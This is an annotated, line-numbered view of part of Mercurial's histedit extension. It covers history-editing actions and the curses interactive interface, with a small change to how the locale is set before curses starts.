952 951 abortdirty()
953 952
954 953 def continueclean(self):
955 954 basectx = self.repo[b'.']
956 955 return basectx, []
957 956
958 957 def _verifynodeconstraints(self, prev, expected, seen):
959 958 # base can only be used with a node not in the edited set
960 959 if self.node in expected:
961 960 msg = _(b'%s "%s" changeset was an edited list candidate')
962 961 raise error.ParseError(
963 962 msg % (self.verb, node.short(self.node)),
964 963 hint=_(b'base must only use unlisted changesets'),
965 964 )
966 965
967 966
968 967 @action(
969 968 [b'_multifold'],
970 969 _(
971 970 """fold subclass used for when multiple folds happen in a row
972 971
973 972 We only want to fire the editor for the folded message once when
974 973 (say) four changes are folded down into a single change. This is
975 974 similar to rollup, but we should preserve both messages so that
976 975 when the last fold operation runs we can show the user all the
977 976 commit messages in their editor.
978 977 """
979 978 ),
980 979 internal=True,
981 980 )
982 981 class _multifold(fold):
983 982 def skipprompt(self):
984 983 return True
985 984
986 985
987 986 @action(
988 987 [b"roll", b"r"],
989 988 _(b"like fold, but discard this commit's description and date"),
990 989 )
991 990 class rollup(fold):
992 991 def mergedescs(self):
993 992 return False
994 993
995 994 def skipprompt(self):
996 995 return True
997 996
998 997 def firstdate(self):
999 998 return True
1000 999
1001 1000
1002 1001 @action([b"drop", b"d"], _(b'remove commit from history'))
1003 1002 class drop(histeditaction):
1004 1003 def run(self):
1005 1004 parentctx = self.repo[self.state.parentctxnode]
1006 1005 return parentctx, [(self.node, tuple())]
1007 1006
1008 1007
1009 1008 @action(
1010 1009 [b"mess", b"m"],
1011 1010 _(b'edit commit message without changing commit content'),
1012 1011 priority=True,
1013 1012 )
1014 1013 class message(histeditaction):
1015 1014 def commiteditor(self):
1016 1015 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.mess')
1017 1016
1018 1017
1019 1018 def findoutgoing(ui, repo, remote=None, force=False, opts=None):
1020 1019 """utility function to find the first outgoing changeset
1021 1020
1022 1021 Used by initialization code"""
1023 1022 if opts is None:
1024 1023 opts = {}
1025 1024 dest = ui.expandpath(remote or b'default-push', remote or b'default')
1026 1025 dest, branches = hg.parseurl(dest, None)[:2]
1027 1026 ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
1028 1027
1029 1028 revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
1030 1029 other = hg.peer(repo, opts, dest)
1031 1030
1032 1031 if revs:
1033 1032 revs = [repo.lookup(rev) for rev in revs]
1034 1033
1035 1034 outgoing = discovery.findcommonoutgoing(repo, other, revs, force=force)
1036 1035 if not outgoing.missing:
1037 1036 raise error.Abort(_(b'no outgoing ancestors'))
1038 1037 roots = list(repo.revs(b"roots(%ln)", outgoing.missing))
1039 1038 if len(roots) > 1:
1040 1039 msg = _(b'there are ambiguous outgoing revisions')
1041 1040 hint = _(b"see 'hg help histedit' for more detail")
1042 1041 raise error.Abort(msg, hint=hint)
1043 1042 return repo[roots[0]].node()
1044 1043
1045 1044
1046 1045 # Curses Support
1047 1046 try:
1048 1047 import curses
1049 1048 except ImportError:
1050 1049 curses = None
1051 1050
1052 1051 KEY_LIST = [b'pick', b'edit', b'fold', b'drop', b'mess', b'roll']
1053 1052 ACTION_LABELS = {
1054 1053 b'fold': b'^fold',
1055 1054 b'roll': b'^roll',
1056 1055 }
1057 1056
1058 1057 COLOR_HELP, COLOR_SELECTED, COLOR_OK, COLOR_WARN, COLOR_CURRENT = 1, 2, 3, 4, 5
1059 1058 COLOR_DIFF_ADD_LINE, COLOR_DIFF_DEL_LINE, COLOR_DIFF_OFFSET = 6, 7, 8
1060 1059 COLOR_ROLL, COLOR_ROLL_CURRENT, COLOR_ROLL_SELECTED = 9, 10, 11
1061 1060
1062 1061 E_QUIT, E_HISTEDIT = 1, 2
1063 1062 E_PAGEDOWN, E_PAGEUP, E_LINEUP, E_LINEDOWN, E_RESIZE = 3, 4, 5, 6, 7
1064 1063 MODE_INIT, MODE_PATCH, MODE_RULES, MODE_HELP = 0, 1, 2, 3
1065 1064
1066 1065 KEYTABLE = {
1067 1066 b'global': {
1068 1067 b'h': b'next-action',
1069 1068 b'KEY_RIGHT': b'next-action',
1070 1069 b'l': b'prev-action',
1071 1070 b'KEY_LEFT': b'prev-action',
1072 1071 b'q': b'quit',
1073 1072 b'c': b'histedit',
1074 1073 b'C': b'histedit',
1075 1074 b'v': b'showpatch',
1076 1075 b'?': b'help',
1077 1076 },
1078 1077 MODE_RULES: {
1079 1078 b'd': b'action-drop',
1080 1079 b'e': b'action-edit',
1081 1080 b'f': b'action-fold',
1082 1081 b'm': b'action-mess',
1083 1082 b'p': b'action-pick',
1084 1083 b'r': b'action-roll',
1085 1084 b' ': b'select',
1086 1085 b'j': b'down',
1087 1086 b'k': b'up',
1088 1087 b'KEY_DOWN': b'down',
1089 1088 b'KEY_UP': b'up',
1090 1089 b'J': b'move-down',
1091 1090 b'K': b'move-up',
1092 1091 b'KEY_NPAGE': b'move-down',
1093 1092 b'KEY_PPAGE': b'move-up',
1094 1093 b'0': b'goto', # Used for 0..9
1095 1094 },
1096 1095 MODE_PATCH: {
1097 1096 b' ': b'page-down',
1098 1097 b'KEY_NPAGE': b'page-down',
1099 1098 b'KEY_PPAGE': b'page-up',
1100 1099 b'j': b'line-down',
1101 1100 b'k': b'line-up',
1102 1101 b'KEY_DOWN': b'line-down',
1103 1102 b'KEY_UP': b'line-up',
1104 1103 b'J': b'down',
1105 1104 b'K': b'up',
1106 1105 },
1107 1106 MODE_HELP: {},
1108 1107 }
1109 1108
1110 1109
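# TIOCGWINSZ fills a struct winsize whose first two shorts are (rows, columns),
# matching what getmaxyx()/resizeterm() expect in the event loop below.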
1111 1110 def screen_size():
1112 1111 return struct.unpack(b'hh', fcntl.ioctl(1, termios.TIOCGWINSZ, b' '))
1113 1112
1114 1113
1115 1114 class histeditrule(object):
1116 1115 def __init__(self, ui, ctx, pos, action=b'pick'):
1117 1116 self.ui = ui
1118 1117 self.ctx = ctx
1119 1118 self.action = action
1120 1119 self.origpos = pos
1121 1120 self.pos = pos
1122 1121 self.conflicts = []
1123 1122
1124 1123 def __bytes__(self):
1125 1124 # Example display of several histeditrules:
1126 1125 #
1127 1126 # #10 pick 316392:06a16c25c053 add option to skip tests
1128 1127 # #11 ^roll 316393:71313c964cc5 <RED>oops a fixup commit</RED>
1129 1128 # #12 pick 316394:ab31f3973b0d include mfbt for mozilla-config.h
1130 1129 # #13 ^fold 316395:14ce5803f4c3 fix warnings
1131 1130 #
1132 1131 # The carets point to the changeset being folded into ("roll this
1133 1132 # changeset into the changeset above").
1134 1133 return b'%s%s' % (self.prefix, self.desc)
1135 1134
1136 1135 __str__ = encoding.strmethod(__bytes__)
1137 1136
1138 1137 @property
1139 1138 def prefix(self):
1140 1139 # Some actions ('fold' and 'roll') combine a patch with a
1141 1140 # previous one. Add a marker showing which patch they apply
1142 1141 # to.
1143 1142 action = ACTION_LABELS.get(self.action, self.action)
1144 1143
1145 1144 h = self.ctx.hex()[0:12]
1146 1145 r = self.ctx.rev()
1147 1146
1148 1147 return b"#%s %s %d:%s " % (
1149 1148 (b'%d' % self.origpos).ljust(2),
1150 1149 action.ljust(6),
1151 1150 r,
1152 1151 h,
1153 1152 )
1154 1153
1155 1154 @property
1156 1155 def desc(self):
1157 1156 summary = (
1158 1157 cmdutil.rendertemplate(
1159 1158 self.ctx, self.ui.config(b'histedit', b'summary-template')
1160 1159 )
1161 1160 or b''
1162 1161 )
1163 1162 if summary:
1164 1163 return summary
1165 1164 # This is split off from the prefix property so that we can
1166 1165 # separately make the description for 'roll' red (since it
1167 1166 # will get discarded).
1168 1167 return self.ctx.description().splitlines()[0].strip()
1169 1168
1170 1169 def checkconflicts(self, other):
1171 1170 if other.pos > self.pos and other.origpos <= self.origpos:
1172 1171 if set(other.ctx.files()) & set(self.ctx.files()) != set():
1173 1172 self.conflicts.append(other)
1174 1173 return self.conflicts
1175 1174
1176 1175 if other in self.conflicts:
1177 1176 self.conflicts.remove(other)
1178 1177 return self.conflicts
1179 1178
1180 1179
1181 1180 # ============ EVENTS ===============
1182 1181 def movecursor(state, oldpos, newpos):
1183 1182 '''Change the rule/changeset that the cursor is pointing to, regardless of
1184 1183 current mode (you can switch between patches from the view patch window).'''
1185 1184 state[b'pos'] = newpos
1186 1185
1187 1186 mode, _ = state[b'mode']
1188 1187 if mode == MODE_RULES:
1189 1188 # Scroll through the list by updating the view for MODE_RULES, so that
1190 1189 # even if we are not currently viewing the rules, switching back will
1191 1190 # result in the cursor's rule being visible.
1192 1191 modestate = state[b'modes'][MODE_RULES]
1193 1192 if newpos < modestate[b'line_offset']:
1194 1193 modestate[b'line_offset'] = newpos
1195 1194 elif newpos > modestate[b'line_offset'] + state[b'page_height'] - 1:
1196 1195 modestate[b'line_offset'] = newpos - state[b'page_height'] + 1
1197 1196
1198 1197 # Reset the patch view region to the top of the new patch.
1199 1198 state[b'modes'][MODE_PATCH][b'line_offset'] = 0
1200 1199
1201 1200
1202 1201 def changemode(state, mode):
1203 1202 curmode, _ = state[b'mode']
1204 1203 state[b'mode'] = (mode, curmode)
1205 1204 if mode == MODE_PATCH:
1206 1205 state[b'modes'][MODE_PATCH][b'patchcontents'] = patchcontents(state)
1207 1206
1208 1207
1209 1208 def makeselection(state, pos):
1210 1209 state[b'selected'] = pos
1211 1210
1212 1211
1213 1212 def swap(state, oldpos, newpos):
1214 1213 """Swap two positions and calculate necessary conflicts in
1215 1214 O(|newpos-oldpos|) time"""
1216 1215
1217 1216 rules = state[b'rules']
1218 1217 assert 0 <= oldpos < len(rules) and 0 <= newpos < len(rules)
1219 1218
1220 1219 rules[oldpos], rules[newpos] = rules[newpos], rules[oldpos]
1221 1220
1222 1221 # TODO: swap should not know about histeditrule's internals
1223 1222 rules[newpos].pos = newpos
1224 1223 rules[oldpos].pos = oldpos
1225 1224
1226 1225 start = min(oldpos, newpos)
1227 1226 end = max(oldpos, newpos)
1228 1227 for r in pycompat.xrange(start, end + 1):
1229 1228 rules[newpos].checkconflicts(rules[r])
1230 1229 rules[oldpos].checkconflicts(rules[r])
1231 1230
1232 1231 if state[b'selected']:
1233 1232 makeselection(state, newpos)
1234 1233
1235 1234
1236 1235 def changeaction(state, pos, action):
1237 1236 """Change the action state on the given position to the new action"""
1238 1237 rules = state[b'rules']
1239 1238 assert 0 <= pos < len(rules)
1240 1239 rules[pos].action = action
1241 1240
1242 1241
1243 1242 def cycleaction(state, pos, next=False):
1244 1243 """Changes the action state the next or the previous action from
1245 1244 the action list"""
1246 1245 rules = state[b'rules']
1247 1246 assert 0 <= pos < len(rules)
1248 1247 current = rules[pos].action
1249 1248
1250 1249 assert current in KEY_LIST
1251 1250
1252 1251 index = KEY_LIST.index(current)
1253 1252 if next:
1254 1253 index += 1
1255 1254 else:
1256 1255 index -= 1
1257 1256 changeaction(state, pos, KEY_LIST[index % len(KEY_LIST)])
1258 1257
1259 1258
1260 1259 def changeview(state, delta, unit):
1261 1260 '''Change the region of whatever is being viewed (a patch or the list of
1262 1261 changesets). 'delta' is an amount (+/- 1) and 'unit' is 'page' or 'line'.'''
1263 1262 mode, _ = state[b'mode']
1264 1263 if mode != MODE_PATCH:
1265 1264 return
1266 1265 mode_state = state[b'modes'][mode]
1267 1266 num_lines = len(mode_state[b'patchcontents'])
1268 1267 page_height = state[b'page_height']
1269 1268 unit = page_height if unit == b'page' else 1
1270 1269 num_pages = 1 + (num_lines - 1) // page_height
1271 1270 max_offset = (num_pages - 1) * page_height
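# e.g. with page_height = 20 and a 45-line patch: num_pages = 3 and
# max_offset = 40, so line_offset below is clamped to the range [0, 40]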
1272 1271 newline = mode_state[b'line_offset'] + delta * unit
1273 1272 mode_state[b'line_offset'] = max(0, min(max_offset, newline))
1274 1273
1275 1274
1276 1275 def event(state, ch):
1277 1276 """Change state based on the current character input
1278 1277
1279 1278 Takes the current state and, based on the character typed by the user,
1280 1279 either updates it in place or returns an event code for the caller to handle.
1281 1280 """
1282 1281 selected = state[b'selected']
1283 1282 oldpos = state[b'pos']
1284 1283 rules = state[b'rules']
1285 1284
1286 1285 if ch in (curses.KEY_RESIZE, b"KEY_RESIZE"):
1287 1286 return E_RESIZE
1288 1287
1289 1288 lookup_ch = ch
1290 1289 if ch is not None and b'0' <= ch <= b'9':
1291 1290 lookup_ch = b'0'
1292 1291
1293 1292 curmode, prevmode = state[b'mode']
1294 1293 action = KEYTABLE[curmode].get(
1295 1294 lookup_ch, KEYTABLE[b'global'].get(lookup_ch)
1296 1295 )
1297 1296 if action is None:
1298 1297 return
1299 1298 if action in (b'down', b'move-down'):
1300 1299 newpos = min(oldpos + 1, len(rules) - 1)
1301 1300 movecursor(state, oldpos, newpos)
1302 1301 if selected is not None or action == b'move-down':
1303 1302 swap(state, oldpos, newpos)
1304 1303 elif action in (b'up', b'move-up'):
1305 1304 newpos = max(0, oldpos - 1)
1306 1305 movecursor(state, oldpos, newpos)
1307 1306 if selected is not None or action == b'move-up':
1308 1307 swap(state, oldpos, newpos)
1309 1308 elif action == b'next-action':
1310 1309 cycleaction(state, oldpos, next=True)
1311 1310 elif action == b'prev-action':
1312 1311 cycleaction(state, oldpos, next=False)
1313 1312 elif action == b'select':
1314 1313 selected = oldpos if selected is None else None
1315 1314 makeselection(state, selected)
1316 1315 elif action == b'goto' and int(ch) < len(rules) and len(rules) <= 10:
1317 1316 newrule = next((r for r in rules if r.origpos == int(ch)))
1318 1317 movecursor(state, oldpos, newrule.pos)
1319 1318 if selected is not None:
1320 1319 swap(state, oldpos, newrule.pos)
1321 1320 elif action.startswith(b'action-'):
1322 1321 changeaction(state, oldpos, action[7:])
1323 1322 elif action == b'showpatch':
1324 1323 changemode(state, MODE_PATCH if curmode != MODE_PATCH else prevmode)
1325 1324 elif action == b'help':
1326 1325 changemode(state, MODE_HELP if curmode != MODE_HELP else prevmode)
1327 1326 elif action == b'quit':
1328 1327 return E_QUIT
1329 1328 elif action == b'histedit':
1330 1329 return E_HISTEDIT
1331 1330 elif action == b'page-down':
1332 1331 return E_PAGEDOWN
1333 1332 elif action == b'page-up':
1334 1333 return E_PAGEUP
1335 1334 elif action == b'line-down':
1336 1335 return E_LINEDOWN
1337 1336 elif action == b'line-up':
1338 1337 return E_LINEUP
1339 1338
1340 1339
1341 1340 def makecommands(rules):
1342 1341 """Returns a list of commands consumable by histedit --commands based on
1343 1342 our list of rules"""
1344 1343 commands = []
1345 1344 for rules in rules:
1346 1345 commands.append(b'%s %s\n' % (rules.action, rules.ctx))
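# e.g. b'pick 7c2fd3b9020c\n' -- the action verb plus the 12-character hash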
1347 1346 return commands
1348 1347
1349 1348
1350 1349 def addln(win, y, x, line, color=None):
1351 1350 """Add a line to the given window left padding but 100% filled with
1352 1351 whitespace characters, so that the color appears on the whole line"""
1353 1352 maxy, maxx = win.getmaxyx()
1354 1353 length = maxx - 1 - x
1355 1354 line = bytes(line).ljust(length)[:length]
1356 1355 if y < 0:
1357 1356 y = maxy + y
1358 1357 if x < 0:
1359 1358 x = maxx + x
1360 1359 if color:
1361 1360 win.addstr(y, x, line, color)
1362 1361 else:
1363 1362 win.addstr(y, x, line)
1364 1363
1365 1364
1366 1365 def _trunc_head(line, n):
1367 1366 if len(line) <= n:
1368 1367 return line
1369 1368 return b'> ' + line[-(n - 2) :]
1370 1369
1371 1370
1372 1371 def _trunc_tail(line, n):
1373 1372 if len(line) <= n:
1374 1373 return line
1375 1374 return line[: n - 2] + b' >'
1376 1375
1377 1376
1378 1377 def patchcontents(state):
1379 1378 repo = state[b'repo']
1380 1379 rule = state[b'rules'][state[b'pos']]
1381 1380 displayer = logcmdutil.changesetdisplayer(
1382 1381 repo.ui, repo, {b"patch": True, b"template": b"status"}, buffered=True
1383 1382 )
1384 1383 overrides = {(b'ui', b'verbose'): True}
1385 1384 with repo.ui.configoverride(overrides, source=b'histedit'):
1386 1385 displayer.show(rule.ctx)
1387 1386 displayer.close()
1388 1387 return displayer.hunk[rule.ctx.rev()].splitlines()
1389 1388
1390 1389
1391 1390 def _chisteditmain(repo, rules, stdscr):
1392 1391 try:
1393 1392 curses.use_default_colors()
1394 1393 except curses.error:
1395 1394 pass
1396 1395
1397 1396 # initialize color pattern
1398 1397 curses.init_pair(COLOR_HELP, curses.COLOR_WHITE, curses.COLOR_BLUE)
1399 1398 curses.init_pair(COLOR_SELECTED, curses.COLOR_BLACK, curses.COLOR_WHITE)
1400 1399 curses.init_pair(COLOR_WARN, curses.COLOR_BLACK, curses.COLOR_YELLOW)
1401 1400 curses.init_pair(COLOR_OK, curses.COLOR_BLACK, curses.COLOR_GREEN)
1402 1401 curses.init_pair(COLOR_CURRENT, curses.COLOR_WHITE, curses.COLOR_MAGENTA)
1403 1402 curses.init_pair(COLOR_DIFF_ADD_LINE, curses.COLOR_GREEN, -1)
1404 1403 curses.init_pair(COLOR_DIFF_DEL_LINE, curses.COLOR_RED, -1)
1405 1404 curses.init_pair(COLOR_DIFF_OFFSET, curses.COLOR_MAGENTA, -1)
1406 1405 curses.init_pair(COLOR_ROLL, curses.COLOR_RED, -1)
1407 1406 curses.init_pair(
1408 1407 COLOR_ROLL_CURRENT, curses.COLOR_BLACK, curses.COLOR_MAGENTA
1409 1408 )
1410 1409 curses.init_pair(COLOR_ROLL_SELECTED, curses.COLOR_RED, curses.COLOR_WHITE)
1411 1410
1412 1411 # don't display the cursor
1413 1412 try:
1414 1413 curses.curs_set(0)
1415 1414 except curses.error:
1416 1415 pass
1417 1416
1418 1417 def rendercommit(win, state):
1419 1418 """Renders the commit window that shows the log of the current selected
1420 1419 commit"""
1421 1420 pos = state[b'pos']
1422 1421 rules = state[b'rules']
1423 1422 rule = rules[pos]
1424 1423
1425 1424 ctx = rule.ctx
1426 1425 win.box()
1427 1426
1428 1427 maxy, maxx = win.getmaxyx()
1429 1428 length = maxx - 3
1430 1429
1431 1430 line = b"changeset: %d:%s" % (ctx.rev(), ctx.hex()[:12])
1432 1431 win.addstr(1, 1, line[:length])
1433 1432
1434 1433 line = b"user: %s" % ctx.user()
1435 1434 win.addstr(2, 1, line[:length])
1436 1435
1437 1436 bms = repo.nodebookmarks(ctx.node())
1438 1437 line = b"bookmark: %s" % b' '.join(bms)
1439 1438 win.addstr(3, 1, line[:length])
1440 1439
1441 1440 line = b"summary: %s" % (ctx.description().splitlines()[0])
1442 1441 win.addstr(4, 1, line[:length])
1443 1442
1444 1443 line = b"files: "
1445 1444 win.addstr(5, 1, line)
1446 1445 fnx = 1 + len(line)
1447 1446 fnmaxx = length - fnx + 1
1448 1447 y = 5
1449 1448 fnmaxn = maxy - (1 + y) - 1
1450 1449 files = ctx.files()
1451 1450 for i, line1 in enumerate(files):
1452 1451 if len(files) > fnmaxn and i == fnmaxn - 1:
1453 1452 win.addstr(y, fnx, _trunc_tail(b','.join(files[i:]), fnmaxx))
1454 1453 y = y + 1
1455 1454 break
1456 1455 win.addstr(y, fnx, _trunc_head(line1, fnmaxx))
1457 1456 y = y + 1
1458 1457
1459 1458 conflicts = rule.conflicts
1460 1459 if len(conflicts) > 0:
1461 1460 conflictstr = b','.join(map(lambda r: r.ctx.hex()[:12], conflicts))
1462 1461 conflictstr = b"changed files overlap with %s" % conflictstr
1463 1462 else:
1464 1463 conflictstr = b'no overlap'
1465 1464
1466 1465 win.addstr(y, 1, conflictstr[:length])
1467 1466 win.noutrefresh()
1468 1467
1469 1468 def helplines(mode):
1470 1469 if mode == MODE_PATCH:
1471 1470 help = b"""\
1472 1471 ?: help, k/up: line up, j/down: line down, v: stop viewing patch
1473 1472 pgup: prev page, space/pgdn: next page, c: commit, q: abort
1474 1473 """
1475 1474 else:
1476 1475 help = b"""\
1477 1476 ?: help, k/up: move up, j/down: move down, space: select, v: view patch
1478 1477 d: drop, e: edit, f: fold, m: mess, p: pick, r: roll
1479 1478 pgup/K: move patch up, pgdn/J: move patch down, c: commit, q: abort
1480 1479 """
1481 1480 return help.splitlines()
1482 1481
1483 1482 def renderhelp(win, state):
1484 1483 maxy, maxx = win.getmaxyx()
1485 1484 mode, _ = state[b'mode']
1486 1485 for y, line in enumerate(helplines(mode)):
1487 1486 if y >= maxy:
1488 1487 break
1489 1488 addln(win, y, 0, line, curses.color_pair(COLOR_HELP))
1490 1489 win.noutrefresh()
1491 1490
1492 1491 def renderrules(rulesscr, state):
1493 1492 rules = state[b'rules']
1494 1493 pos = state[b'pos']
1495 1494 selected = state[b'selected']
1496 1495 start = state[b'modes'][MODE_RULES][b'line_offset']
1497 1496
1498 1497 conflicts = [r.ctx for r in rules if r.conflicts]
1499 1498 if len(conflicts) > 0:
1500 1499 line = b"potential conflict in %s" % b','.join(
1501 1500 map(pycompat.bytestr, conflicts)
1502 1501 )
1503 1502 addln(rulesscr, -1, 0, line, curses.color_pair(COLOR_WARN))
1504 1503
1505 1504 for y, rule in enumerate(rules[start:]):
1506 1505 if y >= state[b'page_height']:
1507 1506 break
1508 1507 if len(rule.conflicts) > 0:
1509 1508 rulesscr.addstr(y, 0, b" ", curses.color_pair(COLOR_WARN))
1510 1509 else:
1511 1510 rulesscr.addstr(y, 0, b" ", curses.COLOR_BLACK)
1512 1511
1513 1512 if y + start == selected:
1514 1513 rollcolor = COLOR_ROLL_SELECTED
1515 1514 addln(rulesscr, y, 2, rule, curses.color_pair(COLOR_SELECTED))
1516 1515 elif y + start == pos:
1517 1516 rollcolor = COLOR_ROLL_CURRENT
1518 1517 addln(
1519 1518 rulesscr,
1520 1519 y,
1521 1520 2,
1522 1521 rule,
1523 1522 curses.color_pair(COLOR_CURRENT) | curses.A_BOLD,
1524 1523 )
1525 1524 else:
1526 1525 rollcolor = COLOR_ROLL
1527 1526 addln(rulesscr, y, 2, rule)
1528 1527
1529 1528 if rule.action == b'roll':
1530 1529 rulesscr.addstr(
1531 1530 y,
1532 1531 2 + len(rule.prefix),
1533 1532 rule.desc,
1534 1533 curses.color_pair(rollcolor),
1535 1534 )
1536 1535
1537 1536 rulesscr.noutrefresh()
1538 1537
1539 1538 def renderstring(win, state, output, diffcolors=False):
1540 1539 maxy, maxx = win.getmaxyx()
1541 1540 length = min(maxy - 1, len(output))
1542 1541 for y in range(0, length):
1543 1542 line = output[y]
1544 1543 if diffcolors:
1545 1544 if line and line[0] == b'+':
1546 1545 win.addstr(
1547 1546 y, 0, line, curses.color_pair(COLOR_DIFF_ADD_LINE)
1548 1547 )
1549 1548 elif line and line[0] == b'-':
1550 1549 win.addstr(
1551 1550 y, 0, line, curses.color_pair(COLOR_DIFF_DEL_LINE)
1552 1551 )
1553 1552 elif line.startswith(b'@@ '):
1554 1553 win.addstr(y, 0, line, curses.color_pair(COLOR_DIFF_OFFSET))
1555 1554 else:
1556 1555 win.addstr(y, 0, line)
1557 1556 else:
1558 1557 win.addstr(y, 0, line)
1559 1558 win.noutrefresh()
1560 1559
1561 1560 def renderpatch(win, state):
1562 1561 start = state[b'modes'][MODE_PATCH][b'line_offset']
1563 1562 content = state[b'modes'][MODE_PATCH][b'patchcontents']
1564 1563 renderstring(win, state, content[start:], diffcolors=True)
1565 1564
1566 1565 def layout(mode):
1567 1566 maxy, maxx = stdscr.getmaxyx()
1568 1567 helplen = len(helplines(mode))
1569 1568 return {
1570 1569 b'commit': (12, maxx),
1571 1570 b'help': (helplen, maxx),
1572 1571 b'main': (maxy - helplen - 12, maxx),
1573 1572 }
1574 1573
1575 1574 def drawvertwin(size, y, x):
1576 1575 win = curses.newwin(size[0], size[1], y, x)
1577 1576 y += size[0]
1578 1577 return win, y, x
1579 1578
1580 1579 state = {
1581 1580 b'pos': 0,
1582 1581 b'rules': rules,
1583 1582 b'selected': None,
1584 1583 b'mode': (MODE_INIT, MODE_INIT),
1585 1584 b'page_height': None,
1586 1585 b'modes': {
1587 1586 MODE_RULES: {b'line_offset': 0,},
1588 1587 MODE_PATCH: {b'line_offset': 0,},
1589 1588 },
1590 1589 b'repo': repo,
1591 1590 }
1592 1591
1593 1592 # eventloop
1594 1593 ch = None
1595 1594 stdscr.clear()
1596 1595 stdscr.refresh()
1597 1596 while True:
1598 1597 try:
1599 1598 oldmode, _ = state[b'mode']
1600 1599 if oldmode == MODE_INIT:
1601 1600 changemode(state, MODE_RULES)
1602 1601 e = event(state, ch)
1603 1602
1604 1603 if e == E_QUIT:
1605 1604 return False
1606 1605 if e == E_HISTEDIT:
1607 1606 return state[b'rules']
1608 1607 else:
1609 1608 if e == E_RESIZE:
1610 1609 size = screen_size()
1611 1610 if size != stdscr.getmaxyx():
1612 1611 curses.resizeterm(*size)
1613 1612
1614 1613 curmode, _ = state[b'mode']
1615 1614 sizes = layout(curmode)
1616 1615 if curmode != oldmode:
1617 1616 state[b'page_height'] = sizes[b'main'][0]
1618 1617 # Adjust the view to fit the current screen size.
1619 1618 movecursor(state, state[b'pos'], state[b'pos'])
1620 1619
1621 1620 # Pack the windows against the top, each pane spread across the
1622 1621 # full width of the screen.
1623 1622 y, x = (0, 0)
1624 1623 helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
1625 1624 mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
1626 1625 commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
1627 1626
1628 1627 if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
1629 1628 if e == E_PAGEDOWN:
1630 1629 changeview(state, +1, b'page')
1631 1630 elif e == E_PAGEUP:
1632 1631 changeview(state, -1, b'page')
1633 1632 elif e == E_LINEDOWN:
1634 1633 changeview(state, +1, b'line')
1635 1634 elif e == E_LINEUP:
1636 1635 changeview(state, -1, b'line')
1637 1636
1638 1637 # start rendering
1639 1638 commitwin.erase()
1640 1639 helpwin.erase()
1641 1640 mainwin.erase()
1642 1641 if curmode == MODE_PATCH:
1643 1642 renderpatch(mainwin, state)
1644 1643 elif curmode == MODE_HELP:
1645 1644 renderstring(mainwin, state, __doc__.strip().splitlines())
1646 1645 else:
1647 1646 renderrules(mainwin, state)
1648 1647 rendercommit(commitwin, state)
1649 1648 renderhelp(helpwin, state)
1650 1649 curses.doupdate()
1651 1650 # done rendering
1652 1651 ch = encoding.strtolocal(stdscr.getkey())
1653 1652 except curses.error:
1654 1653 pass
1655 1654
1656 1655
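The layout/drawvertwin pair above carves the screen into full-width help, main and commit panes stacked from the top, each new window starting at the y offset left by the previous one. A self-contained sketch of that stacking pattern; the pane heights are invented and the sketch assumes a reasonably tall terminal::

    import curses

    def stack_panes(stdscr, heights):
        """Create full-width windows stacked from the top of the screen."""
        maxy, maxx = stdscr.getmaxyx()
        wins, y = [], 0
        for h in heights:
            # newwin(nlines, ncols, begin_y, begin_x)
            wins.append(curses.newwin(h, maxx, y, 0))
            y += h
        return wins

    def demo(stdscr):
        maxy, _ = stdscr.getmaxyx()
        helpwin, mainwin, commitwin = stack_panes(stdscr, [3, maxy - 15, 12])
        for name, win in ((b'help', helpwin), (b'main', mainwin), (b'commit', commitwin)):
            win.erase()
            win.addstr(0, 0, name)
            win.noutrefresh()
        curses.doupdate()
        stdscr.getkey()

    if __name__ == '__main__':
        curses.wrapper(demo)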
1657 1656 def _chistedit(ui, repo, freeargs, opts):
1658 1657 """interactively edit changeset history via a curses interface
1659 1658
1660 1659 Provides an ncurses interface to histedit. Press ? in chistedit mode
1661 1660 to see extensive help. Requires python-curses to be installed."""
1662 1661
1663 1662 if curses is None:
1664 1663 raise error.Abort(_(b"Python curses library required"))
1665 1664
1666 1665 # disable color
1667 1666 ui._colormode = None
1668 1667
1669 1668 try:
1670 1669 keep = opts.get(b'keep')
1671 1670 revs = opts.get(b'rev', [])[:]
1672 1671 cmdutil.checkunfinished(repo)
1673 1672 cmdutil.bailifchanged(repo)
1674 1673
1675 1674 if os.path.exists(os.path.join(repo.path, b'histedit-state')):
1676 1675 raise error.Abort(
1677 1676 _(
1678 1677 b'history edit already in progress, try '
1679 1678 b'--continue or --abort'
1680 1679 )
1681 1680 )
1682 1681 revs.extend(freeargs)
1683 1682 if not revs:
1684 1683 defaultrev = destutil.desthistedit(ui, repo)
1685 1684 if defaultrev is not None:
1686 1685 revs.append(defaultrev)
1687 1686 if len(revs) != 1:
1688 1687 raise error.Abort(
1689 1688 _(b'histedit requires exactly one ancestor revision')
1690 1689 )
1691 1690
1692 1691 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
1693 1692 if len(rr) != 1:
1694 1693 raise error.Abort(
1695 1694 _(
1696 1695 b'The specified revisions must have '
1697 1696 b'exactly one common root'
1698 1697 )
1699 1698 )
1700 1699 root = rr[0].node()
1701 1700
1702 1701 topmost = repo.dirstate.p1()
1703 1702 revs = between(repo, root, topmost, keep)
1704 1703 if not revs:
1705 1704 raise error.Abort(
1706 1705 _(b'%s is not an ancestor of working directory')
1707 1706 % node.short(root)
1708 1707 )
1709 1708
1710 1709 ctxs = []
1711 1710 for i, r in enumerate(revs):
1712 1711 ctxs.append(histeditrule(ui, repo[r], i))
1713 # Curses requires setting the locale or it will default to the C
1714 # locale. This sets the locale to the user's default system
1715 # locale.
1716 locale.setlocale(locale.LC_ALL, '')
1717 rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))
1712 with util.with_lc_ctype():
1713 rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))
1718 1714 curses.echo()
1719 1715 curses.endwin()
1720 1716 if rc is False:
1721 1717 ui.write(_(b"histedit aborted\n"))
1722 1718 return 0
1723 1719 if type(rc) is list:
1724 1720 ui.status(_(b"performing changes\n"))
1725 1721 rules = makecommands(rc)
1726 1722 with repo.vfs(b'chistedit', b'w+') as fp:
1727 1723 for r in rules:
1728 1724 fp.write(r)
1729 1725 opts[b'commands'] = fp.name
1730 1726 return _texthistedit(ui, repo, freeargs, opts)
1731 1727 except KeyboardInterrupt:
1732 1728 pass
1733 1729 return -1
1734 1730
